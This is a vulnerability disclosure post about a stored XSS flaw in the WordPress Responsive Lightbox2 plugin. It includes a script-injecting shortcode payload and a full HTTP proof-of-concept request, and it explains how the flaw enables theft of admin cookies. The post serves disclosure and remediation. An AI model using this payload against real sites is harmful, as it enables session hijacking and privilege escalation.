Posted on by Melbin Mathew

Stored XSS Vulnerability in WordPress Responsive Lightbox2 Plugin

WordPress Responsive Lightbox2 Plugin version 1.0.2 and below were found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

WordPress Responsive Lightbox2 plugin is used to add a lightbox functionality to your WordPress site. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The ‘hyperlink’ field in used while linking an image from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Responsive Lightbox2 version 1.0.2 and below are affected.

The image below shows our javascript is being executed when the following string is inserted into the post.

[lightbox2 url="http://example.com/wp-content/uploads/images/lightbox.jpg" hyperlink="<script>alert(0)</script>"]

This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.

Proof of Concept

POST /w/wp-json/wp/v2/posts/208?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 140
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://127.0.0.1
Referer: http://127.0.0.1/w/wp-admin/post.php?post=208&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close

{"id":208,"content":"[lightbox2 url=\"http://example.com/wp-content/uploads/images/lightbox.jpg\" hyperlink=\"<script>alert(0)</script>\"]"}

Recommendation

All user inputs should be sanitized before publishing the post.